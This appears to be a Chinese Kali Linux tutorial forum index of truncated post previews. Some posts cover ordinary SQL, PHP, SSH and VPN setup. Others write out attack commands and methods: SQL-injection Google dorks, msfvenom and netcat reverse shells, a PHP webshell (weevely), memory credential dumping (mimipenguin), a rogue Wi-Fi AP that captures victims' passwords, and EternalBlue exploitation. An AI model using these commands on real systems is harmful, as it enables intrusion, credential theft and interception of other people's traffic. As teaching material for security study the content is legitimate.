Linux Kali高级学习教程
介绍Linux KALI的使用方法和各种系统工具的下载方法。
404个主题在此版块
-
- 0 篇回复
- 195 次查看
GitHub 上的 Awesome 系列(资源大全系列),是一个汇总了优秀工具资源的大集合,并由 GitHub 社区用户持续维护和更新。初始的版本都是英文,伯乐在线组织整理了热门资源大全的中文版。目前,中文版的资源列表在 GitHub 总计已经有超过 10K star 和 数千 fork 。以下是各个开发和设计资源的详细介绍。 Java 资源大全 Java资源大全中文版,包括:构建工具、字节码操作、集群管理、代码分析、编译器生成工具、外部配置工具、持续集成、数据结构、数据库、时间日期工具库、依赖注入、开发流程增强工具、分布式应用、分布式数据库、文档处理工具、函数式编程、游戏开发、GUI、高性能计算、IDE、图像处理、JSON、JVM与JDK、日志、机器学习、消息传递、应用监控工具、自然语言处理等。 GitHub 主页:https://github.com/jobbole/awesome-java-cn 单个资源的详细介绍,发布在这里:http://hao.jobbole.com/?catid=32 Python 资源大全 Python 资源大全中文版,包括:环境管理、包管理、构建工具、分发、Web框架、网络爬虫、模板引擎、数据库、数据可视化、图像处理、文本处理、自然语言处理、配置、命令行工具、地理位置、CMS、缓存、数据验证、反垃圾、GUI、游戏开发等。 GitHub 主页: https://github.com/jobbole/awesome-python-cn 单个资源的详细介绍,发布在这里:http://hao.jobbole.c…
Ken1Ve的最后回复, -
- 0 篇回复
- 135 次查看
本文讲述如何查找数据库里重复的行。这是初学者十分普遍遇到的问题。方法也很简单。这个问题还可以有其他演变,例如,如何查找“两字段重复的行”(#mysql IRC 频道问到的问题) 如何查找重复行 第一步是定义什么样的行才是重复行。多数情况下很简单:它们某一列具有相同的值。本文采用这一定义,或许你对“重复”的定义比这复杂,你需要对sql做些修改。本文要用到的数据样本: create table test(id int not null primary key, day date not null); insert into test(id, day) values(1, '2006-10-08'); insert into test(id, day) values(2, '2006-10-08'); insert into test(id, day) values(3, '2006-10-09'); select * from test; +----+------------+ | id | day | +----+------------+ | 1 | 2006-10-08 | | 2 | 2006-10-08 | 32006-10-09前面两行在day字段具有相同的值,因此如何我将他们当做重复行,这里有一查询语句可以查找。查询语句使用GROUP BY子句把具有相同字段值的行归为一组,然后计算组的大小。 select day, count(*) from test GROUP BY da…
Ken1Ve的最后回复, -
- 0 篇回复
- 128 次查看
MSFVENOM常规选项1.–p (- -payload-options)添加载荷payload。 载荷这个东西比较多,这个软件就是根据对应的载荷payload生成对应平台下的后门,所以只有选对payload,再填写正确自己的IP,PORT就可以生成对应语言,对应平台的后门了!!! (- -payload-options 列出payload选项) 2 –l查看所有payload encoder nops。 3.–f (- -help-formats)输出文件格式。 (- -help-formats 列出所有文件格式) Executable formats: asp, aspx, aspx-exe, axis2, dll, elf, elf-so, exe, exe-only, exe-service, exe-small, hta-psh, jar, loop-vbs, macho, msi, msi-nouac, osx-app, psh, psh-net, psh-reflection, psh-cmd, vba, vba-exe, vba-psh, vbs, warTransform formats: , c, csharp, dw, dword, hex, java, js_be, js_le, num, perl, pl, powershell, ps1, py, python, raw, rb, ruby, sh, vbapplication, vbscript4.–e编码免杀。 5.–a (- -platform – -…
Ken1Ve的最后回复, -
id= inurl:Produit.php?id= inurl:Profile_view.php?id= inurl:Publications.php?id= inurl:Stray-Questions-View.php?num= inurl:aboutbook.php?id= inurl:ages.php?id= inurl:announce.php?id= inurl:art.php?idm= inurl:article.php?ID= inurl:articleshow.asp?articleid= inurl:artikelinfo.php?id= inurl:asp inurl:asp?id= inurl:avd_start.php?avd= inurl:band_info.php?id= inurl:buy.php?category= inurl:category.php?id= inurl:channel_id= inurl:chappies.php?id= inurl:clanek.php4?id= inurl:clubpage.php?id= inurl:collectionitem.php?id= inurl:communique_detail.php?id= inurl:curriculum.php?id= inurl:declaration_more.php?decl_id= inurl:detail.php?ID= inurl:download.php?id= inurl:downloads_info.php?i…
Ken1Ve的最后回复, -
- 0 篇回复
- 201 次查看
安装mysqlapt-get install -y mariadb-server mariadb-client设置数据库密码sudo mysql_secure_installation安装apache2apt-get install apache2安装PHP7.0apt-get install php7.0安装PHP模块apt-get install php7.0 php-pear libapache2-mod-php7.0 php7.0-mysql apt-get install php7.0-curl php7.0-json php7.0-cgi sudo apt-get install php7.0-gd 版权属于:逍遥子大表哥 本文链接:https://blog.bbskali.cn/35.html 按照知识共享署名-非商业性使用 4.0 国际协议进行许可,转载引用文章应遵循相同协议。
Ken1Ve的最后回复, -
- 0 篇回复
- 204 次查看
一:准备1.开始前,先连上无线网卡,因为虚拟机中的kali系统不用调用笔记本自带的无线网卡,所以需要一个外接无线网卡,然后接入kali系统。 2.输入 ifconfig -a 查看网卡,多了个 wlan0说明网卡已经适配好,不然可能是驱动有问题。 3.开启monitor模式,这里有些进程会影响到monitor模式的开启,如果开启成功可忽略,不然就依提示操作。 4.按提示操作的结果: 5.监听网络,完了 Ctrl+C 退出。 6.主要参数说明: #BSSID :路由器、AP的MAC地址<p></p> <p style="line-height: 30px; text-indent: 2em;">#PWR :信号强度,一看就是越小越强了</p> <p style="line-height: 30px; text-indent: 2em;">##Data :传输的数据大小,大的可能在下载或看视频什么的</p> <p style="line-height: 30px; text-indent: 2em;">#CH :无线信道,要看准</p> <p style="line-height: 30px; text-indent: 2em;">#ENC :加密协议,自WPA2协议爆出重大安全漏洞,现已经出WPA3,坐等更新</p> <p style="line-height: 30px; text-i…
Ken1Ve的最后回复, -
- 0 篇回复
- 127 次查看
1、ls [选项] [目录名 | 列出相关目录下的所有目录和文件 -a 列出包括.a开头的隐藏文件的所有文件 -A 通-a,但不列出"."和".." -l 列出文件的详细信息 -c 根据ctime排序显示 -t 根据文件修改时间排序 ---color[=WHEN] 用色彩辨别文件类型 WHEN 可以是'never'、'always'或'auto'其中之一 白色:表示普通文件 蓝色:表示目录 绿色:表示可执行文件 红色:表示压缩文件 浅蓝色:链接文件 红色闪烁:表示链接的文件有问题 黄色:表示设备文件 灰色:表示其它文件 2、mv [选项] 源文件或目录 目录或多个源文件 | 移动或重命名文件 -b 覆盖前做备份 -f 如存在不询问而强制覆盖 -i 如存在则询问是否覆盖 -u 较新才覆盖 -t 将多个源文件移动到统一目录下,目录参数在前,文件参数在后 eg: mv a /tmp/ 将文件a移动到 /tmp目录下 mv a b 将a命名为b mv /home/zenghao test1.txt test2.txt test 3、cp [选项] 源文件或目录 目录或多个源文件 | 将源文件复制至目标文件,或将多个源文件复制至目标目录。 -r -R 递归复制该目录及其子目录内容 -p 连同档案属性一起复制过去 -f 不询问而强制复制 -s 生成快捷方式 -a 将档案的所有特性都一起复制 4、scp [参数] [原路径] [目标路径] | 在Linux服务…
Ken1Ve的最后回复, -
- 0 篇回复
- 132 次查看
一. 目标思路用阿里云ECS美国服务器, 在CentOS 7系统上,架设VPN服务用PC/iPhone6+ 连接使用VPN服务(阿里云美国服务器)用VPN服务访问国外网络,如Google,Facebook 二. 架设VPNCentOS 7 系统版本 #uname -a Linux mimvp_usa 3.10.0-327.18.2.el7.x86_64 #1 SMP Thu May 12 11:03:55 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux 安装 ppp pptpd iptables ppp 数据链路层协议 pptpd VPN服务类型之一 iptables 防火墙,用来消息转发 $ sudo yum -y install ppp pptpd iptables 安装后版本信息 Package ppp-2.4.5-33.el7.x86_64 already installed and latest version Package pptpd-1.4.0-2.el7.x86_64 already installed and latest version Package iptables-1.4.21-16.el7.x86_64 already installed and latest version 此处,AWS EC2 默认不支持 pptpd 源,提示错误: No package pptpd available解决办法:方法一: 下载rpm包直接安装(推荐) 针对EL6.x版本: wget -c …
Ken1Ve的最后回复, -
- 0 篇回复
- 159 次查看
1. 原理mimipenguin 使用内存计算的技术,读取内存中的凭证信息,linux系统在运行中会将用户名和密码以明文的方式保存在内存中。 2. 下载git clone https://github.com/huntergregal/mimipenguin.git3. 使用在目标机器直接运行mimipenguin命令,如下: shellchmod u+x mimipenguin.py ./mimipenguin.shpythonpython3 ./mimipenguin.py 版权属于:逍遥子大表哥 本文链接:https://blog.bbskali.cn/69.html 按照知识共享署名-非商业性使用 4.0 国际协议进行许可,转载引用文章应遵循相同协议。
Ken1Ve的最后回复, -
- 0 篇回复
- 158 次查看
1. 基本使用1.1 聊天工具服务端 nc -lvp 5678 客户端 nc 192.168.1.15 56781.2 文件传输接收端 nc -lvp 5555 > a.zip 发送端 nc 192.168.1.5 5678 < cms.zip1.3 反向后门监听端 nc -lvp 5678 控制端 nc 192.168.1.5 5678 -e cmd.exe2. 综合使用2.1 结合php反向后门控制端启动监听 nc -lvp 1234编辑php反弹shell后门,vi /usr/share/webshells/php/php-reverse-shell.php,修改 $ip 和 $port 为控制端的地址和端口 将 php-reverse-shell.php 文件上传至目标服务器中,通过浏览器触发 php-reverse-shell.php 文件路径,在nc终端中的到反弹shell 2.2 结合msfvenom使用windows/shell_hidden_bind_tcp msfvenom –p windows/shell_hidden_bind_tcp ahost=192.168.0.107 lport=4444 –f exe > root.exe nc 192.168.0.103 4444 windows/shell_reverse_tcp msfvenom –p windows/shell_reverse_tcp lhost=192.168.0.107 lport=8888 –f exe > roo…
Ken1Ve的最后回复, -
- 0 篇回复
- 139 次查看
weevely 是kali中的php webshell 工具。但相较于 webacoo ,weevely 的功能更加强大,同时对于webshell的连接设立了密码选项!并且携带了大量的管理模块,为渗透带来了更多的惊喜与便利!下面我们来实例演示, weevely 的具体使用。 准备环境:kali linuxMetasploitables2首先还是先制作一个 webshell ,密码为 bbskali weevely generate bbskali secist.php可以看到,很快就为我们生成了一个大小1000多字节的 webshell 。 http://www.secist.com/wp-content/uploads/2016/10/20161014185456.png 我们使用 cat 命令简单查看下 webshell 的内容: cat /usr/share/weevely/secist.phphttp://www.secist.com/wp-content/uploads/2016/10/20161014185525.png 现在我将生成的 webshell 远程拷贝到目标机器上: scp /usr/share/weevely/secist.php [email protected]:/home/msfadmin或者上传PHP木马 连接一句话木马weevely http://192.168.30.128/secist.php secisthttp://www.secist.com/wp-content/uploads/…
Ken1Ve的最后回复, -
- 0 篇回复
- 163 次查看
一:软件介绍WiFi-Pumpkin - Framework for Rogue Wi-Fi Access Point Attack Description WiFi-Pumpkin is a very complete framework for auditing Wi-Fi security. The main feature is the ability to create a fake AP and make Man In The Middle attack, but the list of features is quite broad. 二:安装git clone https://github.com/P0cL4bs/WiFi-Pumpkin.git cd WiFi-Pumpkin ./installer.sh --install或者:下载.deb包进行安装 sudo dpkg -i wifi-pumpkin-0.8.5-all.deb sudo apt-get -f install 三:功能介绍Rogue Wi-Fi Access Point Deauth Attack Clients AP Probe Request Monitor DHCP Starvation Attack Credentials Monitor Transparent Proxy Windows Update Attack Phishing Manager Partial Bypass HSTS protocol Support beef hook…
Ken1Ve的最后回复, -
- 0 篇回复
- 129 次查看
卸载旧版本yum remove php-common 安装PHP7.0及其插件yum install -y php70w php70w-pecl-apcu php70w-xml php70w-mcrypt php70w-gd php70w-devel php70w-mysql php70w-intl php70w-mbstring 这样整个安装过程就结束了。 查看PHP的版本方法一 我们可以利用PHP探针查看,利用vim新建一个PHP文件,里面内容为: <?php phpinfo(); ?>方法二: 登录服务器终端执行命令php -v即可 版权属于:逍遥子大表哥 本文链接:https://blog.bbskali.cn/95.html 按照知识共享署名-非商业性使用 4.0 国际协议进行许可,转载引用文章应遵循相同协议。
Ken1Ve的最后回复, -
- 0 篇回复
- 152 次查看
关于Dsniff 是一个著名的网络嗅探工具包。其开发者 Dug Song 早在1999年12月,以密歇根大学 CITI 研究室(Center for Information Technology Integration)的研究成果为基础,开发了这个 后来具有很大影响力的网络安全工具包。Dug Song 开发 Dsniff 的本意是揭示网络通信的不 安全性,借助这个工具包,网络管理员可以对自己的网络进行审计,也包括渗透测试。但万 事总有其两面 性,Dsniff 所带来的负面作用也是“巨大”的,首先它是可以自由获取的,任 何拥有这个工具包的人都可能做“非正当”的事,其次,Dsniff 里面的某 些工具,充分揭示 了一些安全协议的“不安全性”,例如针对 SSH1和 SSL 的 MITM(Man-In-The-Middle)攻击 工具—SSHmitm 和 Webmitm。SSH1和 SSL 都是建立网络通信加密通道的机制,向来被认 为是很安全的,但人们在具体使用时,往往因为方便性上的考虑而忽视了某些环 节,造成 实事上的不安全。所以说,最大的不安全性,往往并不在于对安全的一无所知,而在于过于 相信自己的安全。 Dub Song 在2000年12月发布了 Dsniff 的 v2.3版本,该版本支持 OpenBSD、Linux、Solaris 系统平台。目前,最新版本是2001年3月发布的 v2.4b1的 Beta 版。Dsniff 的下载网址: http://monkey.org/~dugsong/dsniff/ 除了针对 Unix 系统的版本,从…
Ken1Ve的最后回复, -
- 0 篇回复
- 116 次查看
一、配置SSH参数修改sshd_config文件,命令为:vi /etc/ssh/sshd_config 将#PasswordAuthentication no的注释去掉,并且将NO修改为YES //kali中默认是yes 将PermitRootLogin without-password修改为PermitRootLogin yes 然后保存退出vi编辑器。 二、启动SSH服务命令为:/etc/init.d/ssh start 或者service ssh start 查看SSH服务状态是否正常运行,命令为: /etc/init.d/ssh status 或者 service ssh status注明:这两种启动ssh方式都是临时性的,如果机器重启就需要重新输入上面命令才可以开启ssh,如果需要ssh服务下次开机自动启动,则需要使用以下命令启动ssh服务,命令为: update-rc.d ssh enable //系统自动启动SSH服务 update-rc.d ssh disabled // 关闭系统自动启动SSH服务三、错误解决如果以上两个步骤都操作完了还是登陆不了kali linux的ssh,则需要生成两个秘钥 那么要先生成两个密钥: #ssh-keygen -t dsa -f /etc/ssh/ssh_host_dsa_key #ssh-keygen -t dsa -f /etc/ssh/ssh_host_rsa_key执行命令后都会让输入密码,直接敲回车设置为空即可 版权属于:逍遥子大表哥 本文链接:https://blog…
Ken1Ve的最后回复, -
- 0 篇回复
- 147 次查看
一:运行wifipumpkin终端命令wifi-pumpkin 二:发射钓鱼AP点击界面中的设置,设置钓鱼AP和密码,点击start即可开始 点击start后我们可以看到钓鱼WiFi已经开启。连接钓鱼wifi在home界面可以看到当前连接的设备。 图片获取点击images-cap选项卡即可看到对方访问网站的图片 密码获取点击activity-mouitor选项卡即可看到对方访问网站的密码 版权属于:逍遥子大表哥 本文链接:https://blog.bbskali.cn/102.html 按照知识共享署名-非商业性使用 4.0 国际协议进行许可,转载引用文章应遵循相同协议。
Ken1Ve的最后回复, -
文件类型普通文件(regular file):就是一般存取的文件,由ls -al显示出来的属性中,第一个属性为 [-],例如 [-rwxrwxrwx]。另外,依照文件的内容,又大致可以分为: 1、纯文本文件(ASCII):这是Unix系统中最多的一种文件类型,之所以称为纯文本文件,是因为内容可以直接读到的数据,例如数字、字母等等。设 置文件几乎都属于这种文件类型。举例来说,使用命令“cat ~/. rc”就可以看到该文件的内容(cat是将文件内容读出来)。 2、二进制文件(binary):系统其实仅认识且可以执行二进制文件(binary file)。Linux中的可执行文件(脚本,文本方式的批处理文件不算)就是这种格式的。举例来说,命令cat就是一个二进制文件。 3、数据格式的文件(data):有些程序在运行过程中,会读取某些特定格式的文件,那些特定格式的文件可以称为 数据文件(data file)。举例来说,Linux在用户登入时,都会将登录数据记录在 /var/log/wtmp文件内,该文件是一个数据文件,它能通过last命令读出来。但使用cat时,会读出乱码。因为它是属于一种特殊格式的文件。 目录文件(directory):就是目录,第一个属性为 [d],例如 [drwxrwxrwx]。 连接文件(link):类似Windows下面的快捷方式。第一个属性为 [l],例如 [lrwxrwxrwx]。 设备与设备文件(device):与系统外设及存储等相关的一些文件,通常都集中在 /dev目录。通常又分为两种: 块设备文件:就是存储数据…
Ken1Ve的最后回复, -
- 0 篇回复
- 134 次查看
对于升级后的aircrack-ng 和以前的 大不一样,特别是监听模式的设置,很多人会出现找不到设备会命令出错的各种原因我们先去官网(http://www.aircrack-ng.org/doku.php?id=compatibility_drivers)确定自己网卡是否有被kali2集成后就可以按照以下步骤 进行新的命令操作: 第一步:在设置监听模式前先输入airmon-ng check kill结束进程 第二步:和以前一样载入网卡airmon-ng start wlan0(自己的网卡名) 第三步:他会自动创建一个 wlan0mon接口 记住这个 接口名 而不是以前的mon0 第四步:建立监听 airodump-ng wlan0mon 如果在第四步发现出现错误 那么 有三种可能第一 你的网卡不支持监听模式,第二你的wlan0mon输入错误,第三网卡被其他进程给调用无法获取 第三种情况解决方法:执行airmon-ng check kill 执行 ifconfig wlan0mon up airmon-ng stop wlan0mon 最后跳回上面的第二部进行 如果还不行 那就拔掉网卡 或重启 再次ifconfig 查找时候有无线网卡 标识名一般以wlan开头 如果没有 就 ifconfig wlan0 (或者wlan1 wlan2.。。。载入) up 发现了 并载入了 wlan0跟着第一步走一般不会出错 版权属于:逍遥子大表哥 本文链接:https://blog.bbskali.cn/114.html 按照知识共享署名-非商业性…
Ken1Ve的最后回复, -
- 0 篇回复
- 112 次查看
代码:<!doctype html> <html> <head> <meta charset="utf-8"> <title>表格输出</title> </head> <body> <div style="text-align: center;color: brown"> <?php $b="while表格"; $c="#ff0004"; echo "<h1 color=".$c.">".$b."</h1>"?> </div> <table border="1" bordercolor="#FF0004" align="center" > <?php $out=0; while($out<10){ $bg=$out%2==0 ? "#fffddd" :"#dddddd";#设置第一行颜色和第二行颜色 echo "<tr bgcolor=".$bg.">"; $in=0; while($in<10){ echo "<td>".($out*10+$in)."</td>"; $in++; } echo "</tr>"; $out++; } …
Ken1Ve的最后回复, -
- 0 篇回复
- 132 次查看
其实我们这里所说的使用MSF 实现 “永恒之蓝”的快速攻击,就是利用Metasploit中针对ms17-101漏洞的攻击载荷进行攻击获取主机控制权限。我这里简单的记录下整个攻击利用所需要的工具准备、利用过程以及后渗透的一些简单内容。 本次用到的环境: kali系统.ip地址:192.168.1.106 目标靶机为:win7sp1x64系统(关闭防火墙),ip地址:192.168.1.102 具体的步骤如下: kali系统下安装wine32: dpkg --add-architecture i386 && apt-get update &&apt-get install wine32git clone下载其利用脚本git clone https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit然后将脚本拷贝到 /usr/share/metasploit-framework/modules/exploits/windows/smb cd Eternalblue-Doublepulsar-Metasploit/ cp -r deps/ eternalblue_doublepulsar.rb /usr/share/metasploit-framework/modules/exploits/windows/smbnmap漏洞指定扫描:nmap -n -p445 --script smb-vuln-ms17-010 192.16…
Ken1Ve的最后回复,